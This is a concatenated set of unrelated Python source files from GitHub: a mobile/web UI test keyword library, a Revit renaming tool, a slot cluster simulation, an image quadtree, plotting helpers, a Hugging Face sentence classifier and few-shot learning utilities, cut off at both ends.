WebDriverWait(self.driver, 10, 1).until(lambda x: x.find_element_by_xpath('//*[@text=\"否\"]')).click()\n logger.info('翻译提示已出现,且关闭')\n except:\n logger.info('翻译提示未出现')\n else:\n pass\n logger.info('获取到的当前句柄:' + str(self.driver.contexts))\n logger.info('使用浏览器:' + browserName + '打开网站:' + url + '成功')\n\n def switchContext(self, name):\n self.driver.switch_to.context(name)\n logger.info('切换句柄为:' + name + '成功')\n\n\n\n def clickById(self,eId):\n self.driver.find_element_by_id(eId).click()\n logger.info('点击元素ID为:' + eId + '成功')\n\n def clickByXpath(self,eXpath):\n self.driver.find_element_by_xpath(eXpath).click()\n logger.info('点击元素xpath为:' + eXpath + '成功')\n\n def clearTextById(self,eId):\n self.driver.find_element_by_id(eId).clear()\n logger.info('清除元素ID:' + eId + '成功')\n\n def clearTextByXpath(self,eXpath):\n self.driver.find_element_by_xpath(eXpath).clear()\n logger.info('清除元素xpath:' + eXpath + '成功')\n\n def inputTextById(self,eId,eText):\n self.driver.find_element_by_id(eId).send_keys(eText)\n logger.info('对元素ID:' + eId + '发送文本:' + eText + '成功')\n\n def inputTextByXpath(self,eXpath,eText):\n self.driver.find_element_by_xpath(eXpath).send_keys(eText)\n logger.info('对元素xpath:' + eXpath + '发送文本:' + eText + '成功')\n\n def keyEvent(self,num):\n num = int(num)\n self.driver.keyevent(num)\n logger.info('操作keyevent:' + str(num) + '成功')\n\n def waitMust(self,etime):\n time.sleep(int(etime))\n logger.info('强制等待:' + etime + '成功')\n\n def swipeUp(self, t=500, n=1):\n '''向上滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.5 # x坐标\n y1 = l['height'] * 0.75 # 起始y坐标\n y2 = l['height'] * 0.25 # 终点y坐标\n for i in range(n):\n self.driver.swipe(x1, y1, x1, y2, t)\n\n def swipeDown(self, t=500, n=1):\n '''向下滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.5 # x坐标\n y1 = l['height'] * 0.25 # 起始y坐标\n y2 = l['height'] * 0.75 # 终点y坐标\n for i in range(n):\n self.driver.swipe(x1, y1, x1, y2, t)\n\n def swipLeft(self, t=500, n=1):\n '''向左滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.75\n y1 = l['height'] * 0.5\n x2 = l['width'] * 0.25\n for i in range(n):\n self.driver.swipe(x1, y1, x2, y1, t)\n\n def swipRight(self, t=500, n=1):\n '''向右滑动屏幕'''\n l = self.driver.get_window_size()\n x1 = l['width'] * 0.25\n y1 = l['height'] * 0.5\n x2 = l['width'] * 0.75\n for i in range(n):\n self.driver.swipe(x1, y1, x2, y1, t)\n\n def swipScreen(self,sx,sy,ex,ey,eTime):\n self.driver.swipe(int(sx), int(sy), int(ex), int(ey), int(float(eTime) * 1000))\n\n # 长按ID\n def longPressById(self,eId,eTime):\n TouchAction(self.driver).long_press(self.driver.find_element_by_id(eId)).wait(\n int(float(eTime) * 1000)).perform()\n\n # 长按Xpath\n def longPressByXpath(self, eXpath, eTime):\n TouchAction(self.driver).long_press(self.driver.find_element_by_xpath(eXpath)).wait(\n int(float(eTime) * 1000)).perform()\n\n # 点击坐标eCoor=(615, 52), (690, 146),eTime是秒\n def tapCoor(self,eCoor,eTime):\n self.driver.tap('[' + eCoor + ']', int(float(eTime)*1000))\n logger.info(\"点击坐标:\" + eCoor +\"成功\")\n\n # 关闭应用\n def colseApp(self):\n self.driver.close_app()\n\n # 切换到指定iframe\n def switchToFrame(self,eXpath):\n elc = self.driver.find_element_by_xpath(eXpath)\n self.driver.switch_to.frame(elc)\n logger.info(\"切换到指定frame\" + eXpath +\"成功\")\n\n # 回到上一个iframe\n def switchToLastFrame(self):\n self.driver.switch_to.parent_frame()\n logger.info(\"回到上一个iframe成功\")\n\n # 回到最外层iframe\n def switchToParentFrame(self):\n self.driver.switch_to.default_content()\n logger.info(\"回到最外层iframe成功\")\n\n # 切换新窗口\n def switchWindowColseOld(self):\n handle = self.driver.current_window_handle\n handles = self.driver.window_handles\n for h in handles:\n if handle != h:\n new = h\n self.driver.close()\n self.driver.switch_to.window(new)\n logger.info(\"切换新窗口成功\")\n\n # 关闭其他窗口\n def closeOldWindow(self):\n handle = self.driver.current_window_handle\n for temHandle in self.driver.window_handles:\n if temHandle != handle:\n self.driver.close()\n self.driver.switch_to().window(temHandle)\n logger.info(\"关闭其他窗口成功\")\n\n # 调用js操作页面,如window.scrollBy(0,300),每次向下滑动页面300像素点,window.scroll(0,3000)移动到0,3000像素点位置\n def excuteJs(self, js):\n try:\n self.driver.execute_script(js)\n logger.info(\"操作js:\" + js + \"成功\")\n except Exception as e:\n logger.error(str(traceback.format_exc()))\n\n # 针对按索引进行切换下拉列表option属性\n def selectByIndex(self, eXpath, index):\n Select(self.driver.find_element_by_xpath(eXpath)).select_by_index(index)\n logger.info(\"查找:\" + eXpath + \"中的索引:\" + index + \"成功\")\n\n # 针对按value进行切换下拉列表option属性\n def selectByValue(self, eXpath, value):\n Select(self.driver.find_element_by_xpath(eXpath)).select_by_value(value)\n logger.info(\"查找:\" + eXpath + \"中的值:\" + value + \"成功\")\n\n # 针对按text文本进行切换下拉列表option属性\n def selectByText(self, eXpath, text):\n Select(self.driver.find_element_by_xpath(eXpath)).select_by_visible_text(text)\n logger.info(\"查找:\" + eXpath + \"中的文本:\" + text + \"成功\")\n\n # 针对按索引进行取消下拉列表option属性\n def deselectByIndex(self, eXpath, index):\n Select(self.driver.find_element_by_xpath(eXpath)).deselect_by_index(index)\n logger.info(\"取消:\" + eXpath + \"中的索引:\" + index + \"成功\")\n\n # 针对按value进行取消下拉列表option属性\n def deselectByValue(self, eXpath, value):\n Select(self.driver.find_element_by_xpath(eXpath)).deselect_by_value(value)\n logger.info(\"取消:\" + eXpath + \"中的值:\" + value + \"成功\")\n\n # 针对按text文本进行取消下拉列表option属性\n def deselectByText(self, eXpath, text):\n Select(self.driver.find_element_by_xpath(eXpath)).deselect_by_visible_text(text)\n logger.info(\"取消:\" + eXpath + \"中的文本:\" + text + \"成功\")","repo_name":"lizheng1990/AutoFrameTest","sub_path":"app/appkeyword.py","file_name":"appkeyword.py","file_ext":"py","file_size_in_byte":11218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43054935768","text":"__title__ = \"Rename Elements Engine\"\n__author__ = \"WeWork Design Technology West - Alvaro Luna\"\n__helpurl__ = \"google.com\"\n__min_revit_ver__ = 2017\n__max_revit_ver__ = 2019\n__version__ = \"2.0\"\n\n# WW private global variables | https://www.uuidgenerator.net/version4\n__uiud__ = \"find new\"\n__parameters__ = []\n\n# standard modules\nimport clr # noqa E402\nimport math # noqa E402\nimport os # noqa E402\nimport re # noqa E402\nimport rpw # noqa E402\nimport sys # noqa E402\nimport System # noqa E402\n\nfrom pyrevit import script # noqa E402\n\n# Revit API modules\nclr.AddReference('RevitAPI')\nclr.AddReference('RevitAPIUI')\nimport Autodesk # noqa E402\nfrom Autodesk.Revit.UI import * # noqa E402\nfrom Autodesk.Revit.DB import * # noqa E402\nimport Autodesk.Revit.UI.Selection # noqa E402\n\n# rename elements modules\nimport RenameElements_GUI as REGUI\n\nclass CollectElements:\n def __init__(self):\n # CollectViews output\n self.allViewObjs = None\n \n # CollectSheets output\n self.allSheetObjs = None\n \n # CollectRooms output\n self.allRoomObjs = None\n \n def CollectViews(self):\n self.allViewObjs = [i for i in FilteredElementCollector(self.doc).OfClass(View)\n if self.searchString in i.Name]\n names = [i.Name for i in self.allViewObjs] # not really needed\n return(self.allViewObjs)\n\n def CollectSheets(self):\n self.allSheetObjs = [i for i in FilteredElementCollector(self.doc).OfClass(ViewSheet)]\n return(self.allSheetObjs)\n \n def CollectRooms(self):\n # FilteredElementCollector(self.doc).OfClass(SpatialElement)\n self.allRoomObjs = [i for i in FilteredElementCollector(self.doc).OfCategory(BuiltInCategory.OST_Rooms) \n if \"container\" not in i.Level.Name.lower()] \n return(self.allRoomObjs)\n\nclass RenameElements:\n def __init__(self):\n pass\n \n def RenameViews(self):\n t = Transaction(self.doc, \"Renaming views\")\n t.Start()\n for obj in self.allViewObjs:\n try:\n obj.Name = obj.Name.replace(self.searchString, self.targetString)\n except: pass\n t.Commit()\n \n def RenameSheets(self):\n t = Transaction(self.doc, \"Renaming sheets\")\n t.Start()\n for obj in self.allSheetObjs:\n try:\n newNumber = obj.get_Parameter(BuiltInParameter.SHEET_NUMBER).Set(obj.SheetNumber.Replace(self.searchString, self.targetString))\n print(newNumber)\n except: pass\n t.Commit()\n \n def RenameRooms(self):\n t = Transaction(self.doc, \"Renaming rooms\")\n t.Start()\n for obj in self.allRoomObjs:\n try:\n obj.Name = obj.Name.replace(self.searchString, self.targetString)\n except: pass\n t.Commit() \n\nclass DerivedClass(CollectElements, RenameElements):\n def __init__(self, searchString=None, targetString=None):\n # default input parameters, to be updated by GUI selection\n self.searchString = searchString\n self.targetString = targetString\n \n # revit doc parameters\n self.doc = __revit__.ActiveUIDocument.Document\n self.app = __revit__.Application\n self.version = __revit__.Application.VersionNumber.ToString()\n self.uidoc = __revit__.ActiveUIDocument\n self.currentView = __revit__.ActiveUIDocument.ActiveView\n \n # class inheritance / polymorphism\n CollectElements.__init__(self)\n \n def Run_RenameElements(self):\n # generate GUI\n formObj = REGUI.RE_Form()\n formObj.Run_Form()\n \n # convert default none values to string outputs based on form selection\n self.searchString = formObj.searchString\n self.targetString = formObj.targetString\n \n if formObj.viewsBoolean:\n self.CollectViews()\n self.RenameViews()\n \n if formObj.sheetsBoolean:\n self.CollectSheets()\n self.RenameSheets()","repo_name":"tkahng/pyWest","sub_path":"pyWest.extension/pyWest.tab/Revit Tools.panel/WW_Rename.pulldown/lib/RenameElements_Engine.py","file_name":"RenameElements_Engine.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"19698695967","text":"import numpy as np\nimport random\n\n# Just random columns I made for testing. Replace with your own.\ncolumns = [\n ['⭐', '🟩', '🃏', '⭐', '🔷', '🔶'],\n ['⭐', '⭐', '🔶', '⭐', '🔷', '🔶'],\n ['🔷', '🟩', '🔷', '🟩', '🃏', '🔶'],\n ['⭐', '🟩', '🔷', '🟩', '🔷', '🃏'],\n ['⭐', '🟩', '🔷', '🟩', '🔷', '🔶'],\n ['⭐', '🃏', '🔷', '🟩', '🔷', '🔶']\n]\n\nbonus_symbol = '🃏' # Bonus symbol for testing. Replace with your own.\n\n\ndef play_round():\n # Ok so I think this might be the best way to do it. It will take your list into a 2d array as the columns.\n reel = np.array(columns) # Puts the lists into an array as columns\n\n # Calculate all winning clusters in the reel.\n # Check the center 2x2 grid\n center = reel[2:4, 2:4] # Evaluate the center 2x2 grid\n print(center)\n clusters_center = get_clusters(center)\n clusters = get_clusters(center)\n print(\"Number of clusters in Center: \", len(clusters_center))\n\n # Check the secondary 4x4 grid\n secondary = reel[1:5, 1:5] # Evaluate the secondary 4x4 grid\n print(secondary)\n clusters = get_clusters(secondary)\n clusters_secondary = get_clusters(secondary)\n print(\"Number of clusters in Secondary: \", len(clusters_secondary))\n\n # Check the whole 6x6 grid\n print(reel)\n clusters_whole = get_clusters(reel)\n clusters = get_clusters(reel) # Evaluate the whole 6x6 grid\n print(\"Number of clusters in Whole: \", len(clusters_whole))\n\n # Prints data, prob wont need this for your sim\n print(\"----------------------------------------------------\")\n\n # Check if the BIG FOUR SYMBOL is in a corner. Its the star symbol.\n # corners = [reel[0, 0], reel[0, -1], reel[-1, 0], reel[-1, -1]]\n\n # if '⭐' in corners and grid_size < 6:\n # # If the BIG FOUR SYMBOL is in a corner, increase the grid size for the next round.\n # return grid_size + 2\n # else:\n # # If the BIG FOUR SYMBOL is not in a corner, reset the grid size to 2x2 for the next round.\n # return 2\n\n\ndef get_clusters(reel):\n # Create a 2D boolean array of the same shape as the reel,\n # with all elements initially set to False. This will track\n # which cells we've already visited.\n visited = np.zeros(reel.shape, dtype=bool)\n\n clusters = [] # Initialize the list of clusters to empty.\n\n # For each cell in the reel:\n for i in range(reel.shape[0]):\n for j in range(reel.shape[1]):\n # If we haven't visited this cell yet:\n if not visited[i, j]:\n # Calculate the cluster starting from this cell, and if it's a winning cluster\n # (i.e., has 4 or more cells), add it to our list of clusters.\n cluster = get_cluster(reel, visited, i, j)\n if len(cluster) >= 4:\n clusters.append(cluster)\n return clusters\n\n\ndef get_cluster(reel, visited, i, j):\n symbol = reel[i, j] # The symbol in the current cell.\n cluster = [(i, j)] # Start with just the current cell itself.\n stack = [(i, j)] # Start with the current cell.\n bonus_stack = [] # Stack to hold bonus symbols for processing\n\n # Mark the initial cell as visited.\n visited[i, j] = True\n\n while stack or bonus_stack: # While there are still cells to visit:\n if stack:\n x, y = stack.pop() # Pop a cell from the stack.\n else:\n x, y = bonus_stack.pop() # If the main stack is empty, pop a cell from the bonus stack instead.\n\n # For each of the cell's four neighbors:\n for dx, dy in [(-1, 0), (0, 1), (1, 0), (0, -1)]:\n nx, ny = x + dx, y + dy\n\n # If the neighbor is within the grid, has the same symbol as the current cell,\n # is a bonus symbol, and hasn't been visited yet:\n if (0 <= nx < reel.shape[0] and 0 <= ny < reel.shape[1] and\n (reel[nx, ny] == symbol or reel[nx, ny] == bonus_symbol) and \n not visited[nx, ny]):\n\n # Mark it as visited and add it to the cluster.\n visited[nx, ny] = True\n cluster.append((nx, ny))\n\n # If it's a bonus symbol, add it to the bonus stack. \n # Otherwise, add it to the normal stack.\n if reel[nx, ny] == bonus_symbol:\n bonus_stack.append((nx, ny))\n else:\n stack.append((nx, ny))\n\n return cluster\n\n\n\n\n\n# Function to calculate win based on clusters\n\n\nplay_round()\n","repo_name":"Fishcuit/AhluicSim","sub_path":"oldDfsSims/sim2.py","file_name":"sim2.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26490472528","text":"#!/usr/bin/env python3\nfrom node import Node\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n\nclass Quadtree:\n \"\"\"\n Quadtree defined by its root and # of levels in it\n Root at level 0\n \"\"\"\n def __init__(self, image, nlevels):\n self.image = image\n self.rows, self.cols, _ = self.image.shape\n self.root = Node(0, 0, self.rows, self.cols, self.image, 0)\n self.nlevels = nlevels\n\n # bfs traversal to construct tree by level going downward\n self.fifo = []\n self.ramify()\n\n def ramify(self):\n \"\"\"\n Create quadtree by ramification (i.e. cut image into four quadrants)\n Based on BFS traversal to build level i before level i+1 (using a fifo)\n param parent Parent node (modified in place)\n \"\"\"\n self.fifo.insert(0, self.root)\n\n while len(self.fifo) > 0:\n parent = self.fifo.pop()\n\n # stop condition\n if parent.level == self.nlevels:\n break\n\n # nrows and ncols can be odd\n nrows_child0 = parent.nrows // 2\n nrows_child1 = parent.nrows - nrows_child0\n ncols_child0 = parent.ncols // 2\n ncols_child1 = parent.ncols - ncols_child0\n logger.info('({}, {}, {}, {})'.format(nrows_child0, nrows_child1, ncols_child0, ncols_child1))\n\n # quadrants subsets of size = 0\n if nrows_child0 == 0 or nrows_child1 == 0 or ncols_child0 == 0 or ncols_child1 == 0:\n break\n\n # child at north-west\n row = parent.row\n col = parent.col\n nrows = nrows_child0\n ncols = ncols_child0\n image = self.image[row:row+nrows, col:col+ncols]\n child00 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # child at north-east\n row = parent.row\n col = parent.col + ncols_child0\n nrows = nrows_child0\n ncols = ncols_child1\n image = self.image[row:row+nrows, col:col+ncols]\n child01 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # child at south-west\n row = parent.row + nrows_child0\n col = parent.col\n nrows = nrows_child1\n ncols = ncols_child0\n image = self.image[row:row+nrows, col:col+ncols]\n child10 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # child at south-east\n row = parent.row + nrows_child0\n col = parent.col + ncols_child0\n nrows = nrows_child1\n ncols = ncols_child1\n image = self.image[row:row+nrows, col:col+ncols]\n child11 = Node(row, col, nrows, ncols, image, parent.level + 1)\n\n # push into fifo four children to further subdivide them in next iterations\n parent.children = [child00, child01, child10, child11]\n self.fifo.insert(0, child00)\n self.fifo.insert(0, child01)\n self.fifo.insert(0, child10)\n self.fifo.insert(0, child11)\n\n def traverse(self, node, level, nodes):\n \"\"\"\n Recursive DFS traversal to find quadtree nodes at given level\n return nodes List of nodes at given level\n # of nodes @ level l = 4**l\n \"\"\"\n if level > self.nlevels:\n logger.error('Traverse: level cannot be bigger than nlevels')\n return\n\n if node.level == level:\n nodes.append(node)\n return\n\n for child in node.children:\n self.traverse(child, level, nodes)\n\n def concat(self, node, level):\n \"\"\"\n Recursive concatenation to reconstruct initial image\n @param level Requested level\n \"\"\"\n if level > self.nlevels:\n logger.error('Concat: level cannot be bigger than nlevels')\n return\n\n # stop condition\n children = node.children\n if node.level == level or len(children) == 0:\n return node.image\n\n return [\n [concat(children[0], level), concat(children[1], level)],\n [concat(children[2], level), concat(children[3], level)],\n ]\n","repo_name":"h4k1m0u/image-quadtrees","sub_path":"src/quadtree.py","file_name":"quadtree.py","file_ext":"py","file_size_in_byte":4229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4916529956","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.patches import Polygon,Circle\r\nfrom matplotlib.collections import PatchCollection\r\nimport matplotlib\r\nimport operator\r\nfrom functools import reduce \r\nimport matplotlib.colors as mpc\r\nimport matplotlib.cm as cm\r\n\r\ndef Polygon_collec():\r\n '''\r\n Creating Polygon for meshing the grid\r\n and visualization of Cp_interp data\r\n '''\r\n \r\n r = (np.array([1.4, 1.2, 1.0,0.8, 0.7, 0.6, 0.5, 0.4, 0.3, \r\n 0.25, 0.2, 0.15, 0.10, 0.075, 0.05, 0.025, 0]))\r\n \r\n rr = np.dot((np.add(r[0:16],r[1:17])),0.5)\r\n rr = np.insert(rr,0,1.5)\r\n \r\n theta = np.dot(np.arange(33),2*np.pi/32)\r\n \r\n patches = []\r\n x_cor = []\r\n y_cor = []\r\n \r\n for i in range(32):\r\n \r\n Poly_th = theta[i:i+2].reshape(1,-1)\r\n \r\n for j in range(16):\r\n x_cor.append(np.dot(rr[j],np.cos(theta[i])))\r\n y_cor.append(np.dot(rr[j],np.sin(theta[i])))\r\n \r\n Poly_r = rr[j:j+2].reshape(-1,1)\r\n Poly_x = np.multiply(Poly_r,np.cos(Poly_th))\r\n Poly_y = np.multiply(Poly_r,np.sin(Poly_th))\r\n Poly_x = reduce(operator.add,Poly_x.tolist()) \r\n Poly_y = reduce(operator.add,Poly_y.tolist())\r\n \r\n Verts= list(zip(Poly_x,Poly_y)) \r\n Verts[2], Verts[3] = Verts[3], Verts[2] \r\n \r\n polygon = Polygon(Verts,closed=True)\r\n patches.append(polygon)\r\n \r\n x_cor.append(0) \r\n y_cor.append(0)\r\n \r\n circle = Circle((0, 0), rr.min())\r\n patches.append(circle) \r\n collection = PatchCollection(patches)\r\n \r\n return collection\r\n\r\ndef Plot_press(p, color_list=['blue','white','red'],txt=False,num=1\r\n ,save_fig = False,update=True,cbar = False):\r\n '''\r\n p is 1D array. \r\n Here it is (513,)\r\n '''\r\n \r\n collection = Polygon_collec() # Importing Polygons\r\n \r\n cc = mpc.LinearSegmentedColormap.from_list(\"\",color_list,N=125)\r\n \r\n m = 0.8* np.max(np.abs(p)) # Set colorbar range\r\n# minima = p.min()\r\n# maxima = p.max()\r\n \r\n norm = matplotlib.colors.Normalize(vmin=-m, \r\n vmax= m, clip=False)\r\n \r\n mapper = cm.ScalarMappable(norm=norm, cmap=cc)\r\n \r\n colors = mapper.to_rgba(p) # Mapping values of p data to color\r\n \r\n \r\n fig = plt.figure(num)\r\n ax = plt.gca()\r\n ax.add_collection(collection) # Adding Polygongs\r\n \r\n collection.set_facecolor(colors)\r\n collection.set_edgecolor('black')\r\n collection.set_linewidth(0.25)\r\n \r\n plt.axis('scaled')\r\n ax.set_xlim(-0.9,0.9)\r\n ax.set_ylim(-0.9,0.9) \r\n plt.xticks([], [])\r\n plt.yticks([], [])\r\n \r\n if txt:\r\n ax.text(0.74,-0.82, r'$\\phi_%i$' %num, fontsize=15,\r\n bbox=dict(facecolor='white'))\r\n if cbar:\r\n mapper.set_array([]) \r\n fig.colorbar(mapper, ax = ax)\r\n \r\n if save_fig:\r\n fig.savefig('PCA%i.png' %num) \r\n \r\n plt.show() \r\n\r\n\r\n","repo_name":"Mkarami3/Pattern_recognition_dynamic_PCA_ICA","sub_path":"visual.py","file_name":"visual.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"30075215107","text":"## Jocelyn Huang\n## 10/29/2013\n## Remove Punctuation from String\nimport string\n\ndef removePunctuation(s):\n if not isinstance(s, str): return None\n s = s.replace(\"-\", \" \")\n s = s.replace(\".\", \" \")\n s = s.replace(\"/\", \" \")\n #if('\"' in s): #--> delete the words in between?s\n # print(\"hey\")\n removal = {ord(char): None for char in string.punctuation}\n s = s.translate(removal).lower()\n return s","repo_name":"redoctopus/Sentiment-Analysis-Book-Reviews-2014","sub_path":"RemovePunctuation.py","file_name":"RemovePunctuation.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73949514026","text":"company=dict()\nx=1\nb=[]\nwhile x<=5:\n name=input(\"enter your name:\")\n salary=int(input(\"enter your salary:\"))\n company[name]=salary\n x+=1\nbiggest_salaries=sorted(company.values())[-3:]\nfor i,y in company.items():\n if y in biggest_salaries:\n print(i)\n","repo_name":"k23040198/270201041","sub_path":"lab7/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20648844380","text":"import copy\n\nimport torch\nfrom torch.nn.functional import pad\nfrom transformers import PretrainedConfig, PreTrainedModel\nfrom transformers import AutoConfig, AutoModel, AutoModelForTokenClassification\n\n\nclass ModelForSentencesClassificationConfig(PretrainedConfig):\n model_type = \"model-for-sentences-classification\"\n is_composition = True\n\n def __init__(self, tokens_model_config, sentences_model_config, **kwargs):\n super().__init__(**kwargs)\n\n tokens_model_type = tokens_model_config.pop(\"model_type\")\n sentences_model_type = sentences_model_config.pop(\"model_type\")\n\n self.tokens_model_config = AutoConfig.for_model(tokens_model_type, **tokens_model_config)\n self.sentences_model_config = AutoConfig.for_model(sentences_model_type, **sentences_model_config)\n\n @classmethod\n def from_configs(cls, tokens_model_config, sentences_model_config, **kwargs):\n return cls(\n tokens_model_config=tokens_model_config.to_dict(),\n sentences_model_config=sentences_model_config.to_dict(),\n **kwargs\n )\n\n def to_dict(self):\n output = copy.deepcopy(self.__dict__)\n output[\"tokens_model_config\"] = self.tokens_model_config.to_dict()\n output[\"sentences_model_config\"] = self.sentences_model_config.to_dict()\n output[\"model_type\"] = self.__class__.model_type\n return output\n\nAutoConfig.register(\"model-for-sentences-classification\", ModelForSentencesClassificationConfig)\n\nclass ModelForSentencesClassification(PreTrainedModel):\n config_class = ModelForSentencesClassificationConfig\n base_model_prefix = \"model_for_sentences_classification\"\n\n def __init__(\n self,\n config=None,\n tokens_model=None,\n sentences_model=None\n ):\n assert config is not None or (\n tokens_model is not None and sentences_model is not None\n ), \"Either a configuration or both models has to be provided\"\n if config is None:\n config = ModelForSentencesClassificationConfig.from_configs(\n tokens_model.config, sentences_model.config\n )\n super().__init__(config)\n\n if tokens_model is None:\n tokens_model = AutoModel.from_config(config.tokens_model_config)\n if sentences_model is None:\n sentences_model = AutoModelForTokenClassification.from_config(config.sentences_model_config)\n\n self.tokens_model = tokens_model\n self.sentences_model = sentences_model\n self.tokens_model.config = self.config.tokens_model_config\n self.sentences_model.config = self.config.sentences_model_config\n\n def forward(\n self,\n input_ids=None,\n attention_mask=None,\n token_type_ids=None,\n labels=None\n ):\n assert self.config.sep_token_id >= 0\n assert self.config.max_sentences_count > 0\n\n batch_size = input_ids.size(0)\n sep_token_id = self.config.sep_token_id\n max_sentences_count = self.config.max_sentences_count\n\n sep_indices = input_ids.new_zeros((batch_size, max_sentences_count))\n for i, sample_ids in enumerate(input_ids):\n ids = (sample_ids == sep_token_id).nonzero().squeeze(1)\n ids = ids[:max_sentences_count]\n sep_indices[i, :ids.size(0)] = ids\n mask_sep = (sep_indices != 0).long()\n\n outputs = self.tokens_model(\n input_ids=input_ids,\n attention_mask=attention_mask,\n token_type_ids=token_type_ids,\n return_dict=True\n )\n last_hidden_state = outputs.last_hidden_state\n sentences_states = last_hidden_state[torch.arange(batch_size).unsqueeze(1), sep_indices]\n sentences_states = sentences_states * mask_sep[:, :, None].float()\n\n outputs = self.sentences_model(\n inputs_embeds=sentences_states,\n attention_mask=mask_sep,\n labels=labels\n )\n return outputs\n\n @classmethod\n def from_parts_pretrained(cls, tokens_model_name, sentences_model_config):\n tokens_model = AutoModel.from_pretrained(tokens_model_name)\n config = ModelForSentencesClassificationConfig.from_configs(tokens_model.config, sentences_model_config)\n return cls(tokens_model=tokens_model, config=config)\n\n @classmethod\n def from_pretrained(cls, *args, **kwargs):\n kwargs[\"_fast_init\"] = False\n return super().from_pretrained(*args, **kwargs)\n","repo_name":"IlyaGusev/summarus","sub_path":"external/hf_scripts/extractive_model.py","file_name":"extractive_model.py","file_ext":"py","file_size_in_byte":4470,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"37"} +{"seq_id":"33293189386","text":"from musurgia.pdf.text import TextLabel\nfrom musurgia.timeline.abstractvoice import AbstractVoice\nfrom musurgia.timing import Timing\n\n\nclass Ruler(AbstractVoice):\n def __init__(self, show_interval=5, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._show_interval = None\n self.show_interval = show_interval\n\n @property\n def show_interval(self):\n return self._show_interval\n\n @show_interval.setter\n def show_interval(self, val):\n if not isinstance(val, int):\n raise TypeError('show_interval.value must be of type int not{}'.format(type(val)))\n self._show_interval = val\n self.update_show_intervals()\n\n def update_show_intervals(self):\n for index, line_segment in enumerate(self.line_segments):\n seconds = index\n line_segment.start_mark_line.remove_text_labels()\n if seconds % self.show_interval == 0:\n line_segment.start_mark_line.add_text_label(\n TextLabel(text=Timing.get_clock(seconds, mode='ms'), relative_y=-3, font_size=9))\n line_segment.start_mark_line.thickness = 4\n","repo_name":"alexgorji/musurgia","sub_path":"musurgia/timeline/ruler.py","file_name":"ruler.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2861122638","text":"import os\r\nimport time\r\nimport psutil\r\nimport pprint\r\nimport torch\r\n\r\nimport torch.nn.functional as F\r\nimport numpy as np\r\n\r\nfrom models.classification_heads import ClassificationHead\r\nfrom models.R2D2_embedding import R2D2Embedding\r\nfrom models.protonet_embedding import ProtoNetEmbedding\r\nfrom models.ResNet12_embedding import resnet12\r\n\r\nimport torchvision.transforms as transforms\r\n\r\ndef assert_folder(folder):\r\n import os\r\n if not os.path.exists(folder):\r\n f_path, f_name = os.path.split(folder)\r\n if len(f_path)>0:\r\n assert_folder(f_path)\r\n os.mkdir(folder)\r\n return folder\r\n\r\ndef set_gpu(x):\r\n if x != 'system_set':\r\n os.environ['CUDA_VISIBLE_DEVICES'] = str(x)\r\n else:\r\n x = os.environ['CUDA_VISIBLE_DEVICES']\r\n if x == '':\r\n x = os.environ['FULL_CUDA_VISIBLE_DEVICES']\r\n print('using gpu:', x)\r\n\r\ndef check_dir(path):\r\n '''\r\n Create directory if it does not exist.\r\n path: Path of directory.\r\n '''\r\n if not os.path.exists(path):\r\n os.mkdir(path)\r\n\r\ndef count_accuracy(logits, label):\r\n pred = torch.argmax(logits, dim=1).view(-1)\r\n label = label.view(-1)\r\n accuracy = 100 * pred.eq(label).float().mean()\r\n return accuracy\r\n\r\nclass Timer():\r\n def __init__(self):\r\n self.o = time.time()\r\n\r\n def measure(self, p=1):\r\n x = (time.time() - self.o) / float(p)\r\n x = int(x)\r\n if x >= 3600:\r\n return '{:.1f}h'.format(x / 3600)\r\n if x >= 60:\r\n return '{}m'.format(round(x / 60))\r\n return '{}s'.format(x)\r\n\r\ndef log(log_file_path, string):\r\n '''\r\n Write one line of log into screen and file.\r\n log_file_path: Path of log file.\r\n string: String to write in log file.\r\n '''\r\n with open(log_file_path, 'a+') as f:\r\n f.write(string + '\\n')\r\n f.flush()\r\n print(string)\r\n\r\ndef get_model(options):\r\n # Choose the embedding network\r\n if options.network == 'ProtoNet':\r\n network = ProtoNetEmbedding().cuda()\r\n elif options.network == 'R2D2':\r\n network = R2D2Embedding().cuda()\r\n elif options.network == 'ResNet':\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n else:\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2).cuda()\r\n elif options.network == 'ResNet_star':\r\n if options.dataset == 'miniImageNet' or options.dataset == 'tieredImageNet':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=5, strides=[2, 2, 2, 1],\r\n flatten=False).cuda()\r\n network = torch.nn.DataParallel(network) # , device_ids=[0, 1, 2, 3])\r\n elif options.dataset == 'cub':\r\n network = resnet12(avg_pool=False, drop_rate=0.1, dropblock_size=2, strides=[2, 